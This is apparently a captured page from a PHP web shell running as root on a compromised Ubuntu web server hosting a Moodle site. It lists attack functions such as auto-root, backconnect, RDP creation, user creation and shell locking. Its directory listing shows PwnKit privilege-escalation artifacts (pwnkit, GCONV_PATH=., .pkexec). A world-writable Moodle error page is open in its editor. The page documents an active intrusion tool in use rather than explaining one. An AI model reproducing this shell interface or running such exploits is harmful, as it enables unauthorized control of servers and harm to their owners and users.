Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
error /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
index.php
2.98
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php require('../config.php'); require_once($CFG->libdir.'/eventslib.php'); if ($form = data_submitted()) { // form submitted, do not check referer (original page unknown)! /// Only deal with real users if (!isloggedin()) { redirect($CFG->wwwroot); } /// Work out who to send the message to if (!$admin = get_admin() ) { print_error('cannotfindadmin', 'debug'); } $supportuser = new stdClass(); $supportuser->email = $CFG->supportemail ? $CFG->supportemail : $admin->email; $supportuser->firstname = $CFG->supportname ? $CFG->supportname : $admin->firstname; $supportuser->lastname = $CFG->supportname ? '' : $admin->lastname; // emailstop could be hard coded "false" to ensure error reports are sent // but then admin's would have to alter their messaging preferences to temporarily stop them $supportuser->emailstop = $admin->emailstop; $supportuser->maildisplay = true; /// Send the message and redirect $eventdata = new stdClass(); $eventdata->modulename = 'moodle'; $eventdata->userfrom = $USER; $eventdata->userto = $supportuser; $eventdata->subject = 'Error: '. $form->referer .' -> '. $form->requested; $eventdata->fullmessage = $form->text; $eventdata->fullmessageformat = FORMAT_PLAIN; $eventdata->fullmessagehtml = ''; $eventdata->smallmessage = ''; message_send($eventdata); redirect($CFG->wwwroot .'/course/', 'Message sent, thanks', 3); exit; } $site = get_site(); $redirecturl = empty($_SERVER['REDIRECT_URL']) ? '' : $_SERVER['REDIRECT_URL']; $httpreferer = empty($_SERVER['HTTP_REFERER']) ? '' : $_SERVER['HTTP_REFERER']; $requesturi = empty($_SERVER['REQUEST_URI']) ? '' : $_SERVER['REQUEST_URI']; header("HTTP/1.0 404 Not Found"); header("Status: 404 Not Found"); $PAGE->set_url('/error/'); $PAGE->set_title($site->fullname .':Error'); $PAGE->set_heading($site->fullname .': Error 404'); $PAGE->set_context(get_system_context()); $PAGE->navbar->add('Error 404 - File not Found'); echo $OUTPUT->header(); echo $OUTPUT->box(get_string('pagenotexist', 'error'). '<br />'.s($requesturi), 'generalbox boxaligncenter'); if (isloggedin()) { ?> <p><?php echo get_string('pleasereport', 'error'); ?> <p><form action="<?php echo $CFG->wwwroot ?>/error/index.php" method="post"> <textarea rows="3" cols="50" name="text" id="text" spellcheck="true"></textarea><br /> <input type="hidden" name="referer" value="<?php p($httpreferer) ?>"> <input type="hidden" name="requested" value="<?php p($requesturi) ?>"> <input type="submit" value="<?php echo get_string('sendmessage', 'error'); ?>"> </form> <?php } else { echo $OUTPUT->continue_button($CFG->wwwroot); } echo $OUTPUT->footer(); ?>
Close